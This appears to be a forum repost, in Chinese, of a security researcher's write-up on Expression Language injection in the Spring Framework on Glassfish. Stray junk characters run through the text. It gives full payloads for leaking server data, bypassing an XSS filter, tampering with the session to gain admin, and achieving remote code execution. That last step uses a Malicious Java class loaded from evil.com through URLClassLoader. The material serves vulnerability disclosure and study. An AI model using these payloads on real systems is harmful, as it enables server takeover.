Remote Code with8 h. B. h, E3 z$ V
Expression Language Injection3 ^% F0 x# i0 H. e$ O- ~
Spring Framework脆弱性—DanAmodio1 F: s' e" T2 K4 |
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中 g! A$ d: O; D3 D
可能会存在风险。/ E7 K6 h5 \6 Q; ?7 h4 i& b1 @
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的, ?7 Z; w* O7 C8 j7 b: G
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可. D) {! b) z5 z# I4 t3 ?! c% g
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
$ P0 R) n- D4 b+ p, F0 f2 L6 j% ]以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前0 @! s9 A' C. Q
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。/ I! C" h, a9 ^) r1 F) V
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但$ D" h3 X8 H) n% I6 g: m- ^
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版. _9 I2 |1 Z0 c5 B5 B* n% ?
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
/ R3 O5 p% W: ^- ?这些版本不支持禁用double EL resolution.2 u( h" Y0 c0 n k3 L# `$ a. V
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
1 _8 c* ]$ T! E5 wEL2.2容器上可能进行远程代码执行。
, V! T: ]0 P. c5 Y- l8 W: H这是一个原始信息泄露的攻击例子:
5 d v- M: Z3 Q$ L0 J* s) d请求:
3 T. r- ~: ~+ w" O& Gttp://vulnerable.com/foo?message=${applicationScope}
! {- y. O& ~4 h0 o$ Y到达以下内容页面:& s8 w, L |% ~- J, z5 G1 n# T
结果将输出一些包含内部服务器信息calsspath 和本地工作目录3 E, M# z- Z# J
你也可以做一些其他事情,如这样:/ x; \# [, K: E- m% g9 \1 @/ v
${9999+1}
2 B6 |5 D" f* o- m( |) q还可以访问session 对象和beans
: }& n6 W% k$ }${employee.lastName}
) g* T7 o: |% y, K: {; z/ ~! t' A在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是3 F" X: p: N3 w' T3 x
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东4 B E$ ~+ V6 E" X2 h" ?% c7 R/ _1 Y( r
西,比如XSS.
2 C9 z5 e; e+ R& |哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
+ Z; c6 H! `: D! t& T4 J" _突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤0 f* u# W7 w+ r( k* q
呢?”
- B! @; K+ I) `! ~因此,我尝试巳缦拢�
9 s3 l n4 C) shttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP1 @2 T. X8 N' |3 N z
P
* k) W( g+ s. `, d我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返9 I7 x, N2 D* ^* M
回的文本被插入进了spring:message 标签。+ f& |) M/ `4 i: s, A! N9 f7 x
这里是一个最终绕过过滤的实例:3 D+ I$ V5 ~! ?3 V6 p
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
$ a4 k y t" ? J+ h& \它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
7 e+ P! D) J$ Q: ~# |什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
+ |+ d! |5 M" L经过一番研究,我学习到EL2.2 增加了方法调用。
6 ?5 _1 V4 E, b我写了一个快速测试应用程序代码并且检测一些功能3 Q: X3 | X$ Q- {# T
${pageContext.request.getSession().setAttribute(“account”,”123456″)}) f6 ?9 d# z3 V8 H" E5 [+ [, N
${pageContext.request.getSession().setAttribute(“admin”,true)}
# J3 X) @9 I! I% j好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的4 j, {. U, `; S
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
. U$ v" u) y: t' R/ I* T# Z) l${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.18 x; \6 Z9 Z3 x8 d) u2 f
“, 1234)}
# O3 Q+ {* A- e- e${“”.getClass().forName(“java.lang.Runtime”)}; j0 p# m9 Z$ w. @0 t" J, I# j
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不' J: N; \# R& z h3 L3 L# l
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函2 ?$ T& a, p3 N+ Y6 i& W- Y
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有8 z J$ Q) ~5 v( @( K
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
1 g7 b1 G' |( [$ {方法签名invoke(Object obj, Object„ args): p- t M% _# T$ M
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
1 N. a6 j$ J1 z3 J题,以让它可以工作起来。: N4 y+ Y* b2 W6 e1 n
漏洞利用:
; l6 P0 m. z9 \8 s, j/ w' c我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我6 D% E% H- e7 i% Q* c: i
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
' o; A0 K- H; D7 J0 I6 j9 O0 k这里有一些我试过的失败的用例,为了试图让它工作的用例:
# e; u# T( v `3 T/ Y% p 写文件到文件系统* z, w& h% J1 S0 R) x4 A: l1 M
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
6 F1 Z% A% A- x& c9 f' m: @我认为这些可以很好的工作,但是我不能找到合适的类来载入。
8 \7 R8 G* `' D; L& M0 C+ i${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}4 P2 k; C+ S, c+ {# t% w
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
' s4 S% F$ l% p3 D' ~' aorg.springframework.expression.spel.standard.SpelExpressionParser not found' O3 {9 t9 p4 I
by
4 Y# Y: _4 E! |org.glassfish.web.javax.servlet.jsp [194].
. n: z2 ^; l* N: O; S+ r b 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public3 \. X8 h/ A p' ^
利用反射来创建一个新的Runtime(and watch the world burn)3 |( F! w6 N! \( t
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName; f1 l+ x# {9 s+ l$ r4 k# ]. w
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}/ d: k; }7 _+ k4 W" i
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
- Z4 G* ~ L/ Z) r% J 使用java.lang.ProcessBuilder
6 G8 s: ]: T6 C/ u 用表达式语言来评估表达式语言8 Q; V) x$ B: P* I3 ?: }
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
5 ]3 l0 l! `8 O/ e" ~6 U/ U- m${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request: v& b5 S N! t- A2 _. }) M
“,”".getClass(),null)}, ?+ T) _# [/ ]! `8 S- w
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)' k' Z8 h$ R9 k' _/ z, f: l- i
我在使用一个空数组通过Method.invoke()时失败了很多次/ L: i/ y1 ]; ~ E
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo7 r& S8 F# J# U- P7 L
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
7 D( T* ^5 Z- E7 G8 b+ zrrayList”).newInstance().toArray())0 Q* }3 F+ j" @2 J. B/ X
java.lang.IllegalArgumentException: wrong number of arguments# S* y, h4 X1 j Q* _
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
/ F2 D$ c: e3 K6 ]4 d) H以创建一个恶意class文件并且指向类装载器.; A" Y3 ~$ I6 C3 m
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:1 |* J2 E4 d9 L1 l8 t( Q
public class Malicious {
9 v$ `2 Y" w7 Y1 f! tpublic Malicious() {0 z( w' d$ z: S8 m# X! K
try {6 }& o6 s5 {5 [2 r, X1 m3 I
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
+ Z* F% ~5 Y5 }( i9 c# ojava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
' i( u2 H: _$ L8 D8 b} catch (Exception e) {. D: D$ R2 J n6 M0 R; c" Y
}. g& M8 c. U1 C2 x+ r
}: [; J6 S+ f6 q# c8 \, Q
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
; e2 Z+ z* }1 e2 a1 }0 X' x- P话中,因此它可以被使用.; Y0 G' d6 K# e2 A% f3 a
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName/ _( T5 y" r' z* j
(“java.util.ArrayList”).newInstance())}) Y5 W5 O) ?# y/ L& w
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建3 V. e2 b4 T$ F
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
4 Y" j, z+ R1 q2 s* igetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个9 ^" p4 `+ ]8 Z/ N( @
我们可以调用的create(string)方法,然后转换对一个URL对象。1 m; u5 l8 l9 |, B+ F
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
2 k' H: E3 g0 I* S: }, Sere/malicious/classfile/is/located/”).toURL())}& m6 b0 ]9 y, Y- V0 k
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用," u; g# v. F5 X+ R; y7 b0 W, v
恶意类文件被装载并创建,触发远程代码.) t# A- K% [8 I9 e
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte$ X1 Y: x% g4 z2 N
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().8 | Q6 t: ~! M$ Z0 z0 G# w
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
6 L7 K- Q l- p% G5 c# @()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对